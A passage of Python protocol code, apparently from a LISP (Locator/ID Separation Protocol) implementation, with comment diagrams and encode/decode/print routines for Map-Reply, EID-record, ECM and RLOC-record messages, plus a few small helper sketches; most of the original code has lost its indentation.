if (len(packet) < format_size): return(None)
packet = packet[len(packet)-format_size::]
xtr_id_upper, xtr_id_lower = struct.unpack("QQ", packet[:format_size])
xtr_id_upper = byte_swap_64(xtr_id_upper)
xtr_id_lower = byte_swap_64(xtr_id_lower)
self.xtr_id = (xtr_id_upper << 64) | xtr_id_lower
return(True)
#enddef
#endclass
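#
# lisp_example_xtr_id_roundtrip()
#
# Editor's sketch: the 128-bit xTR-ID travels as two byte-swapped 64-bit
# halves; encode_xtr_id() and decode_xtr_id() above are inverses. Shown
# round-trip style, returning the value it was given.
#
def lisp_example_xtr_id_roundtrip(xtr_id):
    upper = byte_swap_64(xtr_id >> 64)
    lower = byte_swap_64(xtr_id & 0xffffffffffffffff)
    packed = struct.pack("QQ", upper, lower)

    u, l = struct.unpack("QQ", packed)
    return((byte_swap_64(u) << 64) | byte_swap_64(l))
#enddef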
#
# Map-Reply Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=2 |P|E|S| Reserved | Hop Count | Record Count |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Record TTL |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# R |N|Locator Count | EID mask-len | ACT |A| Reserved |
# e +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# c | Rsvd | Map-Version Number | EID-AFI |
# o +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# r | EID-prefix |
# d +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | /| Priority | Weight | M Priority | M Weight |
# | L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | o | Unused Flags |L|p|R| Loc-AFI |
# | c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | \| Locator |
# +-> +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Mapping Protocol Data |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_map_reply():
def __init__(self):
self.rloc_probe = False
self.echo_nonce_capable = False
self.security = False
self.record_count = 0
self.hop_count = 0
self.nonce = 0
self.keys = None
#enddef
def print_map_reply(self):
line = "{} -> flags: {}{}{}, hop-count: {}, record-count: {}, " + \
"nonce: 0x{}"
lprint(line.format(bold("Map-Reply", False), \
"R" if self.rloc_probe else "r",
"E" if self.echo_nonce_capable else "e",
"S" if self.security else "s", self.hop_count, self.record_count,
lisp_hex_string(self.nonce)))
#enddef
def encode(self):
first_long = (LISP_MAP_REPLY << 28) | self.record_count
first_long |= self.hop_count << 8
if (self.rloc_probe): first_long |= 0x08000000
if (self.echo_nonce_capable): first_long |= 0x04000000
if (self.security): first_long |= 0x02000000
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
return(packet)
#enddef
def decode(self, packet):
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
packet = packet[format_size::]
first_long = socket.ntohl(first_long)
self.rloc_probe = True if (first_long & 0x08000000) else False
self.echo_nonce_capable = True if (first_long & 0x04000000) else False
self.security = True if (first_long & 0x02000000) else False
self.hop_count = (first_long >> 8) & 0xff
self.record_count = first_long & 0xff
self.nonce = nonce[0]
if (lisp_crypto_keys_by_nonce.has_key(self.nonce)):
self.keys = lisp_crypto_keys_by_nonce[self.nonce]
self.keys[1].delete_key_by_nonce(self.nonce)
#endif
return(packet)
#enddef
#endclass
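#
# lisp_example_keys_for_nonce()
#
# Editor's usage sketch: an ITR stores its lisp_keys under the Map-Request
# nonce (lisp_keys.add_key_by_nonce()); when a Map-Reply echoes that nonce,
# decode() above reclaims the key state. Hypothetical lookup helper:
#
def lisp_example_keys_for_nonce(nonce):
    if (lisp_crypto_keys_by_nonce.has_key(nonce) == False): return(None)
    return(lisp_crypto_keys_by_nonce[nonce])
#enddef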
#
# This is the structure of an EID record in a Map-Request, Map-Reply, and
# Map-Register.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Locator Count | EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd | Map-Version Number | EID-Prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-Prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# When E is set, the entire locator-set records are encrypted with the chacha
# cipher.
#
# And this for a EID-record in a Map-Referral.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Record TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Referral Count| EID mask-len | ACT |A|I|E| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |SigCnt | Map Version Number | EID-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
class lisp_eid_record():
def __init__(self):
self.record_ttl = 0
self.rloc_count = 0
self.action = 0
self.authoritative = False
self.ddt_incomplete = False
self.signature_count = 0
self.map_version = 0
self.eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.group = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.record_ttl = 0
#enddef
def print_prefix(self):
if (self.group.is_null()):
return(green(self.eid.print_prefix(), False))
#endif
return(green(self.eid.print_sg(self.group), False))
#enddef
def print_ttl(self):
ttl = self.record_ttl
if (self.record_ttl & 0x80000000):
ttl = str(self.record_ttl & 0x7fffffff) + " secs"
elif ((ttl % 60) == 0):
ttl = str(ttl/60) + " hours"
else:
ttl = str(ttl) + " mins"
#endif
return(ttl)
#enddef
def store_ttl(self):
ttl = self.record_ttl * 60
if (self.record_ttl & 0x80000000): ttl = self.record_ttl & 0x7fffffff
return(ttl)
#enddef
def print_record(self, indent, ddt):
incomplete = ""
sig_count = ""
action_str = bold("invalid-action", False)
if (ddt):
if (self.action < len(lisp_map_referral_action_string)):
action_str = lisp_map_referral_action_string[self.action]
action_str = bold(action_str, False)
incomplete = (", " + bold("ddt-incomplete", False)) if \
self.ddt_incomplete else ""
sig_count = (", sig-count: " + str(self.signature_count)) if \
(self.signature_count != 0) else ""
#endif
else:
if (self.action < len(lisp_map_reply_action_string)):
action_str = lisp_map_reply_action_string[self.action]
if (self.action != LISP_NO_ACTION):
action_str = bold(action_str, False)
#endif
#endif
#endif
afi = LISP_AFI_LCAF if (self.eid.afi < 0) else self.eid.afi
line = ("{}EID-record -> record-ttl: {}, rloc-count: {}, action: " +
"{}, {}{}{}, map-version: {}, afi: {}, [iid]eid/ml: {}")
lprint(line.format(indent, self.print_ttl(), self.rloc_count,
action_str, "auth" if (self.authoritative is True) else "non-auth",
incomplete, sig_count, self.map_version, afi,
green(self.print_prefix(), False)))
#enddef
def encode(self):
action = self.action << 13
if (self.authoritative): action |= 0x1000
if (self.ddt_incomplete): action |= 0x800
#
# Decide on AFI value.
#
afi = self.eid.afi if (self.eid.instance_id == 0) else LISP_AFI_LCAF
if (afi < 0): afi = LISP_AFI_LCAF
sg = (self.group.is_null() == False)
if (sg): afi = LISP_AFI_LCAF
sig_mv = (self.signature_count << 12) | self.map_version
mask_len = 0 if self.eid.is_binary() == False else self.eid.mask_len
packet = struct.pack("IBBHHH", socket.htonl(self.record_ttl),
self.rloc_count, mask_len, socket.htons(action),
socket.htons(sig_mv), socket.htons(afi))
#
# Check if we are encoding an (S,G) entry.
#
if (sg):
packet += self.eid.lcaf_encode_sg(self.group)
return(packet)
#endif
#
# Check if we are encoding an geo-prefix in an EID-record.
#
if (self.eid.afi == LISP_AFI_GEO_COORD and self.eid.instance_id == 0):
packet = packet[0:-2]
packet += self.eid.address.encode_geo()
return(packet)
#endif
#
# Check if instance-ID needs to be encoded in the EID record.
#
if (afi == LISP_AFI_LCAF):
packet += self.eid.lcaf_encode_iid()
return(packet)
#endif
#
# Just encode the AFI for the EID.
#
packet += self.eid.pack_address()
return(packet)
#enddef
def decode(self, packet):
packet_format = "IBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
self.record_ttl, self.rloc_count, self.eid.mask_len, action, \
self.map_version, self.eid.afi = \
struct.unpack(packet_format, packet[:format_size])
self.record_ttl = socket.ntohl(self.record_ttl)
action = socket.ntohs(action)
self.action = (action >> 13) & 0x7
self.authoritative = True if ((action >> 12) & 1) else False
self.ddt_incomplete = True if ((action >> 11) & 1) else False
self.map_version = socket.ntohs(self.map_version)
self.signature_count = self.map_version >> 12
self.map_version = self.map_version & 0xfff
self.eid.afi = socket.ntohs(self.eid.afi)
self.eid.instance_id = 0
packet = packet[format_size::]
#
# Check if instance-ID LCAF is encoded in the EID-record.
#
if (self.eid.afi == LISP_AFI_LCAF):
packet, group = self.eid.lcaf_decode_eid(packet)
if (group): self.group = group
self.group.instance_id = self.eid.instance_id
return(packet)
#endif
packet = self.eid.unpack_address(packet)
return(packet)
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
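#
# lisp_example_ttl_to_seconds()
#
# Editor's sketch: the Record TTL is in minutes unless the high-order bit
# is set, in which case the low 31 bits are seconds. This mirrors
# store_ttl() above.
#
def lisp_example_ttl_to_seconds(record_ttl):
    if (record_ttl & 0x80000000): return(record_ttl & 0x7fffffff)
    return(record_ttl * 60)
#enddef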
#
# Encapsulated Control Message Format
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# OH | (uses RLOC addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = 4342 |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LH |Type=8 |S|D|E|M| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | IPv4 or IPv6 Header |
# IH | (uses RLOC or EID addresses) |
# \ | |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# / | Source Port = xxxx | Dest Port = yyyy |
# UDP +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \ | UDP Length | UDP Checksum |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# LCM | LISP Control Message |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
LISP_UDP_PROTOCOL = 17
LISP_DEFAULT_ECM_TTL = 128
class lisp_ecm():
def __init__(self, sport):
self.security = False
self.ddt = False
self.to_etr = False
self.to_ms = False
self.length = 0
self.ttl = LISP_DEFAULT_ECM_TTL
self.protocol = LISP_UDP_PROTOCOL
self.ip_checksum = 0
self.source = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.dest = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.udp_sport = sport
self.udp_dport = LISP_CTRL_PORT
self.udp_checksum = 0
self.udp_length = 0
self.afi = LISP_AFI_NONE
#enddef
def print_ecm(self):
line = ("{} -> flags: {}{}{}{}, " + \
"inner IP: {} -> {}, inner UDP: {} -> {}")
lprint(line.format(bold("ECM", False), "S" if self.security else "s",
"D" if self.ddt else "d", "E" if self.to_etr else "e",
"M" if self.to_ms else "m",
green(self.source.print_address(), False),
green(self.dest.print_address(), False), self.udp_sport,
self.udp_dport))
#enddef
def encode(self, packet, inner_source, inner_dest):
self.udp_length = len(packet) + 8
self.source = inner_source
self.dest = inner_dest
if (inner_dest.is_ipv4()):
self.afi = LISP_AFI_IPV4
self.length = self.udp_length + 20
#endif
if (inner_dest.is_ipv6()):
self.afi = LISP_AFI_IPV6
self.length = self.udp_length
#endif
#
# Encode ECM header first, then the IPv4 or IPv6 header, then the
# UDP header.
#
first_long = (LISP_ECM << 28)
if (self.security): first_long |= 0x08000000
if (self.ddt): first_long |= 0x04000000
if (self.to_etr): first_long |= 0x02000000
if (self.to_ms): first_long |= 0x01000000
ecm = struct.pack("I", socket.htonl(first_long))
ip = ""
if (self.afi == LISP_AFI_IPV4):
ip = struct.pack("BBHHHBBH", 0x45, 0, socket.htons(self.length),
0, 0, self.ttl, self.protocol, socket.htons(self.ip_checksum))
ip += self.source.pack_address()
ip += self.dest.pack_address()
ip = lisp_ip_checksum(ip)
#endif
if (self.afi == LISP_AFI_IPV6):
ip = struct.pack("BBHHBB", 0x60, 0, 0, socket.htons(self.length),
self.protocol, self.ttl)
ip += self.source.pack_address()
ip += self.dest.pack_address()
#endif
s = socket.htons(self.udp_sport)
d = socket.htons(self.udp_dport)
l = socket.htons(self.udp_length)
c = socket.htons(self.udp_checksum)
udp = struct.pack("HHHH", s, d, l, c)
return(ecm + ip + udp)
#enddef
def decode(self, packet):
#
# Decode ECM header.
#
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long[0])
self.security = True if (first_long & 0x08000000) else False
self.ddt = True if (first_long & 0x04000000) else False
self.to_etr = True if (first_long & 0x02000000) else False
self.to_ms = True if (first_long & 0x01000000) else False
packet = packet[format_size::]
#
# Decode inner IPv4/IPv6 and UDP header.
#
if (len(packet) < 1): return(None)
version = struct.unpack("B", packet[0:1])[0]
version = version >> 4
if (version == 4):
format_size = struct.calcsize("HHIBBH")
if (len(packet) < format_size): return(None)
x, l, x, t, p, c = struct.unpack("HHIBBH", packet[:format_size])
self.length = socket.ntohs(l)
self.ttl = t
self.protocol = p
self.ip_checksum = socket.ntohs(c)
self.source.afi = self.dest.afi = LISP_AFI_IPV4
#
# Zero out IPv4 header checksum.
#
p = struct.pack("H", 0)
offset1 = struct.calcsize("HHIBB")
offset2 = struct.calcsize("H")
packet = packet[:offset1] + p + packet[offset1+offset2:]
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
if (version == 6):
format_size = struct.calcsize("IHBB")
if (len(packet) < format_size): return(None)
x, l, p, t = struct.unpack("IHBB", packet[:format_size])
self.length = socket.ntohs(l)
self.protocol = p
self.ttl = t
self.source.afi = self.dest.afi = LISP_AFI_IPV6
packet = packet[format_size::]
packet = self.source.unpack_address(packet)
if (packet == None): return(None)
packet = self.dest.unpack_address(packet)
if (packet == None): return(None)
#endif
self.source.mask_len = self.source.host_mask_len()
self.dest.mask_len = self.dest.host_mask_len()
format_size = struct.calcsize("HHHH")
if (len(packet) < format_size): return(None)
s, d, l, c = struct.unpack("HHHH", packet[:format_size])
self.udp_sport = socket.ntohs(s)
self.udp_dport = socket.ntohs(d)
self.udp_length = socket.ntohs(l)
self.udp_checksum = socket.ntohs(c)
packet = packet[format_size::]
return(packet)
#enddef
#endclass
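#
# lisp_example_ecm_udp_header()
#
# Editor's sketch: the inner UDP header built by lisp_ecm.encode() above is
# four network byte-order shorts; the length covers the 8-byte header plus
# the control-message payload, and the checksum is left zero.
#
def lisp_example_ecm_udp_header(sport, dport, payload_length):
    return(struct.pack("HHHH", socket.htons(sport), socket.htons(dport),
        socket.htons(payload_length + 8), 0))
#enddef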
#
# This is the structure of an RLOC record in a Map-Request, Map-Reply, and
# Map-Register's EID record.
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# /| Priority | Weight | M Priority | M Weight |
# L +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# o | Unused Flags |L|p|R| Loc-AFI |
# c +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# \| Locator |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# AFI-List LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 1 | Rsvd2 | 2 + 4 + 2 + 16 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 1 | IPv4 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv4 Address | AFI = 2 |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... IPv6 Address |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Geo Coordinate LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 5 | Rsvd2 | Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |U|N|E|A|M|R|K| Reserved | Location Uncertainty |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Lat Degrees | Latitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Long Degrees | Longitude Milliseconds |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Altitude |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Radius | Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Explicit Locator Path (ELP) Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 10 | Rsvd2 | n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop 1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Rsvd3 |L|P|S|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reencap Hop k ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Replication List Entry Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 13 | Rsvd2 | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #1 ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #1 RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Rsvd3 | Rsvd4 | Level Value |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | RTR/ETR #n ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | RTR/ETR #n RLOC Name ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Security Key Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 11 | Rsvd2 | 6 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Count | Rsvd3 |A| Cipher Suite| Rsvd4 |R|
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key Length | Public Key Material ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | ... Public Key Material |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Locator Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
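# Editor's sketch before the class: a minimal AFI-List LCAF wrapping one
# RLOC address, using the same header layout lisp_rloc_record.encode_lcaf()
# builds below (payload length = 2 AFI bytes + the address itself).
#
def lisp_example_afi_list_lcaf(rloc):
    lcaf_len = socket.htons(rloc.addr_length() + 2)
    packet = struct.pack("HBBBBHH", socket.htons(LISP_AFI_LCAF), 0, 0,
        LISP_LCAF_AFI_LIST_TYPE, 0, lcaf_len, socket.htons(rloc.afi))
    return(packet + rloc.pack_address())
#enddef
#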
class lisp_rloc_record():
def __init__(self):
self.priority = 0
self.weight = 0
self.mpriority = 0
self.mweight = 0
self.local_bit = False
self.probe_bit = False
self.reach_bit = False
self.rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.geo = None
self.elp = None
self.rle = None
self.json = None
self.rloc_name = None
self.keys = None
#enddef
def print_rloc_name(self, cour=False):
if (self.rloc_name == None): return("")
rloc_name = self.rloc_name
if (cour): rloc_name = lisp_print_cour(rloc_name)
return('rloc-name: {}'.format(blue(rloc_name, cour)))
#enddef
def print_record(self, indent):
rloc_str = self.print_rloc_name()
if (rloc_str != ""): rloc_str = ", " + rloc_str
geo_str = ""
if (self.geo):
name = ""
if (self.geo.geo_name): name = "'{}' ".format(self.geo.geo_name)
geo_str = ", geo: {}{}".format(name, self.geo.print_geo())
#endif
elp_str = ""
if (self.elp):
name = ""
if (self.elp.elp_name): name = "'{}' ".format(self.elp.elp_name)
elp_str = ", elp: {}{}".format(name, self.elp.print_elp(True))
#endif
rle_str = ""
if (self.rle):
name = ""
if (self.rle.rle_name): name = "'{}' ".format(self.rle.rle_name)
rle_str = ", rle: {}{}".format(name, self.rle.print_rle(False))
#endif
json_str = ""
if (self.json):
name = ""
if (self.json.json_name):
name = "'{}' ".format(self.json.json_name)
#endif
json_str = ", json: {}".format(self.json.print_json(False))
#endif
sec_str = ""
if (self.rloc.is_null() == False and self.keys and self.keys[1]):
sec_str = ", " + self.keys[1].print_keys()
#endif
line = ("{}RLOC-record -> flags: {}, {}/{}/{}/{}, afi: {}, rloc: "
+ "{}{}{}{}{}{}{}")
lprint(line.format(indent, self.print_flags(), self.priority,
self.weight, self.mpriority, self.mweight, self.rloc.afi,
red(self.rloc.print_address_no_iid(), False), rloc_str, geo_str,
elp_str, rle_str, json_str, sec_str))
#enddef
def print_flags(self):
return("{}{}{}".format("L" if self.local_bit else "l", "P" \
if self.probe_bit else "p", "R" if self.reach_bit else "r"))
#enddef
def store_rloc_entry(self, rloc_entry):
rloc = rloc_entry.rloc if (rloc_entry.translated_rloc.is_null()) \
else rloc_entry.translated_rloc
self.rloc.copy_address(rloc)
if (rloc_entry.rloc_name):
self.rloc_name = rloc_entry.rloc_name
#endif
if (rloc_entry.geo):
self.geo = rloc_entry.geo
else:
name = rloc_entry.geo_name
if (name and lisp_geo_list.has_key(name)):
self.geo = lisp_geo_list[name]
#endif
#endif
if (rloc_entry.elp):
self.elp = rloc_entry.elp
else:
name = rloc_entry.elp_name
if (name and lisp_elp_list.has_key(name)):
self.elp = lisp_elp_list[name]
